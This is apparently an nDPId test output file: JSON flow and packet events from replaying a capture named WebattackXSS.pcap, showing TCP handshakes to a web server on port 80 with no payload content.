-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347105154,"flow_last_seen":1499347110642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347105154,"flow_last_seen":1499347110642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347106438,"flow_last_seen":1499347111642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53678,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347106438,"flow_last_seen":1499347111642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53678,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347107719,"flow_last_seen":1499347113642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53692,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347107719,"flow_last_seen":1499347113642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53692,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347110266,"flow_last_seen":1499347115643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53718,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347110266,"flow_last_seen":1499347115643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347111565,"flow_last_seen":1499347116643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53732,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347111565,"flow_last_seen":1499347116643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347114111,"flow_last_seen":1499347119643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53758,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347114111,"flow_last_seen":1499347119643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2214,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347233219,"flow_last_seen":1499347233219,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347233219,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55010,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2214,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1499347233219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347233219,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Fw9AAD4GrsGsEAABwKgKMtbiAFBsKfwzAAAAAKACchAy\/gAAAgQFtAQCCAoBOes8AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2215,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":2,"flow_last_seen":1499347233219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347233219,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1uJkUL6IbCn8NKAScSBQbgAAAgQFtAQCCAoD47yyATnrPAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2216,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":3,"flow_last_seen":1499347233220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347233220,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0FxBAAD4GrsisEAABwKgKMtbiAFBsKfw0ZFC+iYAQAOXvdQAAAQEICgE56zwD47yy"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347234469,"flow_last_seen":1499347234469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347234469,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55024,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1499347234469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347234469,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vaZAAD4GCCqsEAABwKgKMtbwAFD38VHSAAAAAKACchBQUQAAAgQFtAQCCAoBOex0AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":1499347234469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347234469,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1vAPBPjT9\/FR06AScSCHigAAAgQFtAQCCAoD473qATnsdAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":3,"flow_last_seen":1499347234470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347234470,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vadAAD4GCDGsEAABwKgKMtbwAFD38VHTDwT41IAQAOUmkgAAAQEICgE57HQD473q"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347235716,"flow_last_seen":1499347235716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347235716,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55038,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1499347235716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347235716,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wLxAAD4GBRSsEAABwKgKMtb+AFAtaC0QAAAAAKACchA+VwAAAgQFtAQCCAoBOe2sAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2236,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1499347235716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347235716,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1v760xqZLWgtEaAScSBmwwAAAgQFtAQCCAoD478iATntrAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2237,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1499347235717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347235717,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wL1AAD4GBRusEAABwKgKMtb+AFAtaC0R+tMamoAQAOUFywAAAQEICgE57awD478i"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347238260,"flow_last_seen":1499347238260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347238260,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55064,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2253,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1499347238260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347238260,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8N5lAAD4GjjesEAABwKgKMtcYAFCMG8exAAAAAKACchBCbAAAAgQFtAQCCAoBOfAoAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2254,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1499347238260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347238260,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1xiQuLeAjBvHsqAScSA1kAAAAgQFtAQCCAoD48GeATnwKAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2255,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":3,"flow_last_seen":1499347238261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347238261,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0N5pAAD4Gjj6sEAABwKgKMtcYAFCMG8eykLi3gYAQAOXUlwAAAQEICgE58CgD48Ge"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347239517,"flow_last_seen":1499347239517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347239517,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55078,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1499347239517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347239517,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8d9VAAD4GTfusEAABwKgKMtcmAFDWiYa3AAAAAKACchA3sAAAAgQFtAQCCAoBOfFiAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":1499347239517,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347239517,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1yYFUEfr1omGuKAScSAkmAAAAgQFtAQCCAoD48LYATnxYgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":3,"flow_last_seen":1499347239518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347239518,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0d9ZAAD4GTgKsEAABwKgKMtcmAFDWiYa4BVBH7IAQAOXDnwAAAQEICgE58WID48LY"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347240786,"flow_last_seen":1499347240786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347240786,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55092,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1499347240786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347240786,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LjpAAD4Gl5asEAABwKgKMtc0AFB5mNylAAAAAKACchA9aAAAAgQFtAQCCAoBOfKfAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":2,"flow_last_seen":1499347240786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347240786,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1zRt9KwCeZjcpqAScSBcVgAAAgQFtAQCCAoD48QWATnynwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2279,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":3,"flow_last_seen":1499347240787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347240787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LjtAAD4Gl52sEAABwKgKMtc0AFB5mNymbfSsA4AQAOX7XAAAAQEICgE58qAD48QW"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347115408,"flow_last_seen":1499347120644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347115408,"flow_last_seen":1499347120644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347116705,"flow_last_seen":1499347122644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53786,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347116705,"flow_last_seen":1499347122644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347119336,"flow_last_seen":1499347124645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53812,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347119336,"flow_last_seen":1499347124645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347120603,"flow_last_seen":1499347125645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53826,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347120603,"flow_last_seen":1499347125645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347123174,"flow_last_seen":1499347128646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53852,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347123174,"flow_last_seen":1499347128646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 